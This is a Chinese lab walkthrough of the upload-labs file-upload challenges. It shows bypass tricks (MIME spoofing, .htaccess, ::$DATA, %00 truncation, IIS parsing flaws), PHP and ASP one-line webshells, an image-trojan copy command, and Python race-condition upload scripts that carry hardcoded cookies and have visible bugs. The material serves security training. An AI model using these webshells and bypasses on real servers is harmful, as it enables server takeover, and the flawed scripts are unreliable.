Upload-libs通关详解

Uplo ad-labs—详解

1前端验证绕过

前端验证绕过可以直接用burp万能绕过前端JS脚本

方法先上传一张jpg

Burp改包然后改后缀

上传成功

2Content-Type方式绕过

此绕过方式是将mimi也就是说文件后缀

我们此时选择上传图片抓包

发现content——tpype为image/jpeg

接下来我们上传1.php将content-type改为和图片一样的上传

然后发现上传成功

3黑名单绕过

这一关是另类的文件名的绕过,可以尝试phtml,php3,php4, php5, pht后缀名都可以绕过,但是前提是要在配置文件里面有这样的一句话

AddType application/x-httpd-php .php .phtml .phps .php5 .pht

这是文件源码不能这些是黑名单

当然还有方法二

构造.htaccess

实现重写文件解析,同样这样的前提也是得在配置文件里面有这样的一句话

AllowOverride All

LoadModule rewrite_module modules/mod_rewrite.so

看一下百度对htaccess的理解

概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。

我个人理解的意思就是,把SetHandler application/x-httpd-php 这句话写成.htaccess,然后上传个jpg,它就当php解析了

cmd制作文件方式,先把这句话写到1.txt,然后ren 1.txt .htaccess,然后就制作好了,先上传这个,然后把php改成jpg上传

访问页面发现没有回显,说明解析成功

这里我们需要注意

关键字要和你的图片马一样 比如我hatccess文件里面是tony

我图片马名称就是tony

然后利用hackbar传参来控制,先pwd看一下所在的位置

然后ls到上层寻找

找到文件,cat一下,然后在源代码里面就能看到了

一开始没有回显以为失败了,结果在源码里

那么问题来了

此时菜刀应该连接tony.php 还是tony.jpg呐

答案如图

然后成功

4.htaccess绕过

可以知道方法三的那些php5 ptml都不行了

只能用.htaccess绕过了

此方法在方法3的第二方案讲了

成功上传

5后缀大小写绕过

只有用大小写绕过

但是我觉得这个应该是情况而定吧 你遇到的不一定就是Php就行的

所以多尝试

各种尝试

访问成功

6文件后缀(空)绕过

这里我们不就不能用大小写后缀绕过

加了全部转换为小写

此时大家别像我一样 在win里面给文件加空格后缀 主要是我之前还加了好久 哈哈

直接上传抓包 然后burp改包一键上传就OK

成功上传

7文件后缀名.绕过

大家仔细观察

可以看见和第六题相比此次少了

这个因此我们可以BP抓包加·绕过

This is succeeful

8 ::$DATA(Windows文件流绕过)

查看源码

还是黑名单,但是没有对后缀名进行去”::$DATA”处理,利用windows特性,可在后缀名中加” ::$DATA”绕过:

之前代码都有除去字符串

但是这里没有

成功绕过

9构造文件后缀绕过

str_replace

这个函数大家不陌生吧

可想而知

他先删除一个点

再删除一个空格

大家可以发现

成功绕过了

. .(点加空格加点)

10双写文件后缀绕过

查看源码

$file_name = trim($_FILES[‘upload_file‘][‘name‘]);//定义name

$file_name = str_ireplace($deny_ext,"", $file_name);//替换上面的php这些为空

找出关键代码

这个很熟悉了吧

Sql双写绕过

由于php特殊

所以双写也得讲道理所以构造下面

pphphp

OK I  am winner

11%00截断绕过。

看源码发现是白名单

但是我们发现ima-path直接拼接 因此可以%00绕过

这个时候可以使用%00截断,但这东西有点过气了,因为需要两个条件

php版本小于5.3.4

php的magic_quotes_gpc为OFF状态

如果要完成这一个题目就必须要实现上面的两个条件,但是现在都PHP7了,这东西也就很少见了,满足上面的条件的时候php就是把它当成结束符,后面的数据直接忽略,这也导致了很多的问题,文件包含也可以利用这一点

所以如果要绕过,我们可以这样去实现,另save_path等于下面的值

但是现在PHP大多数多高于这个版本了

截断时候一定要万分注意%00后面加空格一定要

12%00截断2

这次的save_path是通过post传进来的,还是利用00截断,但这次需要在二进制中进行修改,因为post不会像get对%00进行自动解码。

找到参数后 后面用二进制工具

9.php%00

13图片马

查看源码

发现对文件头进行了处理

并以此判断文件类型
我们可以制作图片马进行上传

注意这里的图片必须是真图片copy下来才能绕过验证

这是我们简单写的一个文件包含

<?php

$file = $_GET[ ‘page‘ ];

include($file);

?>

这样采访才能成功

所以图片木马必须配合文件包含漏洞才能使用

14getimagesize图片类型绕过

查看源码

这里利用了getimagesize

rray getimagesize ( string $filename [, array &$imageinfo ] )

getimagesize() 函数将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型和一个可以用于普通 HTML 文件中 IMG 标记中的 height/width 文本字

和13一样构造图片马上传 同时需要文件包含漏洞

15关php_exif模块图片类型绕过

查看源码

$image_type = exif_imagetype($filename);

这是新加的函数

和13关一样的绕过方法

16二次渲染绕过

查看源码

抓包看上传后图片的那些部分被截取那些没有被截取 然后在讲代码插入未被截取的部分

然后也是文件包含漏洞

同样需要

17条件竞争绕过

查看源码

$temp_file = $_FILES[‘upload_file‘][‘tmp_name‘];//存储在服务器的文件的临时副本的名称

当我们上传web shell文件时,不会先限制php类型文件上传,先利用上面的语句把上传的文件临时存放。再执行下面的if语句进行文件类型的限制和文件名的时间戳。然后执行if(move_uploaded_file($temp_file, $upload_file))//移动到新文件夹

绕过思路是利用代码执行过程有耗费时间的过程。临时webshell文件保存的极短时间,去访问webshell。获取一些信息

我们可以利用burp多线程发包,然后不断在浏览器访问我们的webshell。会有一瞬间的访问成功

python脚本:

# coding:utf-8

import hackhttp

from multiprocessing.dummy import Pool as ThreadPool

def upload(lists):

hh = hackhttp.hackhttp()

raw = """POST / HTTP/1.1

Host: http://localhost:8088/upload-labs-master/Pass-17/index.php

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Referer: http://108.160.142.252:9001/

Content-Type: multipart/form-data; boundary=---------------------------19988116922523

Content-Length: 2196

Cookie: csrftoken=r0XE7UKfalFDMCMqF5fphAprLj2CYhzk; sessionid=gv2xwxra43oe9dj7p5wz8lxjtsz0speg

Connection: close

Upgrade-Insecure-Requests: 1

-----------------------------19988116922523

Content-Disposition: form-data; name="upload_file"; filename="damaxiao.php"

Content-Type: application/octet-stream

<?php assert($_POST["a"])?>

-----------------------------19988116922523

Content-Disposition: form-data; name="submit"

ä¸ä¼

-----------------------------19988116922523--

"""

code, head, html, redirect, log = hh.http(‘http://108.160.142.252:9001/‘, raw=raw)

print(str(code) + "\r")

pool = ThreadPool(20)

pool.map(upload, range(10000))

pool.close()

pool.join()

request模块

import requests

import hackhttp

from multiprocessing.dummy import Pool as ThreadPool

import sys

reload(sys)

sys.setdefaultencoding(‘utf8‘)

url = ‘http://localhost:8088/upload-labs-master/Pass-17/index.php‘

def upload():

file = {

‘file‘: open(‘damaxiao.php‘,‘rb‘)

}

header = {

‘Host‘: ‘108.160.142.252:9001‘,

‘User-Agent‘: ‘Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0‘,

‘Accept‘: ‘text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8‘,

‘Accept-Language‘: ‘zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2‘,

‘Accept-Encoding‘: ‘gzip, deflate‘,

‘Cookie‘: ‘csrftoken=r0XE7UKfalFDMCMqF5fphAprLj2CYhzk; sessionid=gv2xwxra43oe9dj7p5wz8lxjtsz0speg; aM3_sid=s98M8S‘,

‘Connection‘: ‘keep-alive‘,

‘Upgrade-Insecure-Requests‘: ‘1‘,

‘Cache-Control‘: ‘max-age=0‘

}

# def keepreq():

r = requests.post(url,files=file)

print(str(r.status_code) + "\r")

pool = ThreadPool(20)

pool.map(upload(), range(10000))

pool.close()

pool.join()

https://blog.csdn.net/u011377996/article/details/86776198

我也不是很懂嘛

18条件竞争2()

同17

19(CVE-2015-2348 move_uploaded_file() 00截断)

$img_path = UPLOAD_PATH . ‘/‘ .$file_name;

if (move_uploaded_file($_FILES[‘upload_file‘][‘tmp_name‘], $img_path)) {

$is_upload = true;

}else{

$msg = ‘上传失败!‘;

}

CVE-2015-2348 move_uploaded_file() 00截断,上传webshell,同时自定义保存名称,直接保存为php是不行的

发现move_uploaded_file()函数中的img_path是由post参数save_name控制的,因此可以在save_name利用00截断绕过:

利用方式:

利用成功

后面加一个空格便是绕过了不知道为什么这么神奇

20IIS6.0解析漏洞

我们先查看源码

http://www.php.cn/php-weizijiaocheng-402602.html

这个函数是按

https://www.cnblogs.com/kenshinobiy/p/7782910.html

http://www.w3school.com.cn/php/func_array_in_array.asp

先按.将文件名称分割

大概意思就是解析漏洞

成功上传

21IIS文件名解析

学渗透一定要动手操作,一个简单的动作重复N遍以上就能学会了。

最近在学习一句话木马的使用,加上中国菜刀,真是个居家旅行的必备技能。举例说asp的一句话:

<%execute request(chr(97))%>

a就是连接密码了。(一定要写对chr(97),我看着书写char(97)被坑了一下午...还以为是服务器设置问题)。但是今天我练习的时候遇到了只能上传图片的漏洞,然后就去网上找姿势,就学习了IIS6.0的解析漏洞了。

我的练习环境是windows 2003的IIS6.0,这个版本有两个解析漏洞:

1、在网站目录中如果存在名为*.asp、*.asa的目录,那该目录内的任何文件都会被IIS解析为asp文件并执行。

2、在上传图片木马的时候,将文件名改为*.asp;.jpg,该文件文件都会被IIS解析为asp文件并执行。

第一个漏洞测试成功了,在网站目录下创建了一个1.asp目录,在目录下上传了内容为<%execute request(chr(97))%>但文件名为cmd.jpg的”图像“文件,用菜刀成功连接。

第二个漏洞同理,不同的只是之间建立一个同样内容的cmd.asp;.jpg文件。

至于制作asp图片木马,今天学到了一个copy拼接的方法:

准备一张图片(尽可能小点吧,10k左右?对加载应该有影响),命名为1.jpg

写asp一句话木马,命名为1.asp

打开cmd,执行COPY 1.jpg /b + 1.asp /a asp.jpg拼接得到asp.jpg即时asp图片木马了。【/b表示指定一个二进制文件,/a表示指定一个ASCII文件】

22IIS目录解析如上

切记 学习之路 少就是多 慢就是快

原文地址:https://www.cnblogs.com/-zhong/p/10989176.html

时间: 2024-11-25 14:33:54

Upload-libs通关详解的相关文章

[gitbook] Android框架分析系列之Android Binder详解

请支持作者原创: https://mr-cao.gitbooks.io/android/content/android-binder.html Android Binder详解 Table of Contents 1. binder简介 2. binder的实现 2.1. IBinder类简介 2.2. IInterface类简介 2.3. BpBinder和BBinder简介 2.4. ProcessState和IPCThreadState简介 2.5. ServiceManager简介 2.

详解“FTP文件传输服务”安装配置实例

"FTP文件传输服务"安装配置实例 家住海边喜欢浪:zhang789.blog.51cto.com 目录 简介 ftp工作原理 常见的FTP服务 Vsftpd服务器的安装 Vsftpd.conf配置文件详解 配置FTP服务器实例 实例:配置匿名用户 实例:配置本地用户登录 实例:配置虚拟用户登录(MySQL认证) 实例:控制用户登录 实例:设置欢迎信息 分析vsftpd日志管理 FTP服务器配置与管理 简介 FTP 是File Transfer Protocol(文件传输协议)的英文简

Android高效率编码-第三方SDK详解系列(三)——JPush推送牵扯出来的江湖恩怨,XMPP实现推送,自定义客户端推送

Android高效率编码-第三方SDK详解系列(三)--JPush推送牵扯出来的江湖恩怨,XMPP实现推送,自定义客户端推送 很久没有更新第三方SDK这个系列了,所以更新一下这几天工作中使用到的推送,写这个系列真的很要命,你要去把他们的API文档大致的翻阅一遍,而且各种功能都实现一遍,解决各种bug各种坑,不得不说,极光推送真坑,大家使用还是要慎重,我们看一下极光推送的官网 https://www.jpush.cn/common/ 推送比较使用,很多软件有需要,所以在这个点拿出来多讲讲,我们本节

Ossim 中漏洞扫描详解

Ossim 中漏洞扫描详解 Openvas是一套开源漏洞扫描系统,如果手动搭建需要复杂的过程,花费不少人力和时间成本,此文主要针对OSSIM平台下如何以图形化方式操作漏洞扫描的过程. 准备工作:首先确保没有运行的扫描进程和任务 扫描漏洞同时升级漏洞库会导致升级失败. 第一步:同步插件 #openvas-nvt-sync 同步数万个插件时间比较长,可以去喝杯咖啡啦,或者了解一下插件的组成. 表1 Openvas主要脚本分类及分布情况 规则名称 数量 备注 IIS_frontpage_DOS_2.n

linux FTP配置详解

一.vsftpd说明: LINUX下实现FTP服务的软件很多,最常见的有vsftpd,Wu-ftpd和Proftp等.Red Hat Enterprise Linux中默认安装的是vsftpd. 访问FTP服务器时需要经过验证,只有经过了FTP服务器的相关验证,用户才能访问和传输文件.vsftpd提供了3种ftp登录形式:  (1)anonymous(匿名帐号) 使用anonymous是应用广泛的一种FTP服务器.如果用户在FTP服务器上没有帐号,那么用户可以以anonymous为用户名,以自己

迈向angularjs2系列(2):angular2组件和指令详解

<%= INIT %> 内容 一:angular2 helloworld! 为了简单快速的运行一个ng2的app,那么通过script引入预先编译好的angular2版本和页面的基本框架. index.html: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Title</title> &l

Nginx之location 匹配规则详解

Nginx之location 匹配规则详解 关于一些对location认识的误区 1. location 的匹配顺序是"先匹配正则,再匹配普通". 矫正: location 的匹配顺序其实是"先匹配普通,再匹配正则".我这么说,大家一定会反驳我,因为按"先匹配普通,再匹配正则"解释不了大家平时习惯的按"先匹配正则,再匹配普通"的实践经验.这里我只能暂时解释下,造成这种误解的原因是:正则匹配会覆盖普通匹配(实际的规则,比这复杂,

iOS开发——网络编程OC篇&amp;(十二)AFN详解

AFN详解 众所周知,苹果搞的一套框架NSContention发送请求与接收请求的方式十分繁琐.操作起来很不方便.不仅要做区分各种请求设置各种不同的参数,而且还要经常在多线程里操作,同时还要对请求与返回的数据做各种序列化的操作,同时还要考虑请求数据的安全等一堆问题. 一.早前的几个网络框架 1.ASI框架: HTTP终结者.很牛, 但是有BUG, 已经停止更新. 2.MKNetworkKit (印度人写的). 3.AFN一直还在更新. AFNetworking的出现:MAC/iOS设计的一套网络

触碰jQuery:AJAX异步详解

触碰jQuery:AJAX异步详解 传送门:异步编程系列目录…… 示例源码:触碰jQuery:AJAX异步详解.rar AJAX 全称 Asynchronous JavaScript and XML(异步的 JavaScript 和 XML).它并非一种新的技术,而是以下几种原有技术的结合体. 1)   使用CSS和XHTML来表示. 2)   使用DOM模型来交互和动态显示. 3)   使用XMLHttpRequest来和服务器进行异步通信. 4)   使用javascript来绑定和调用.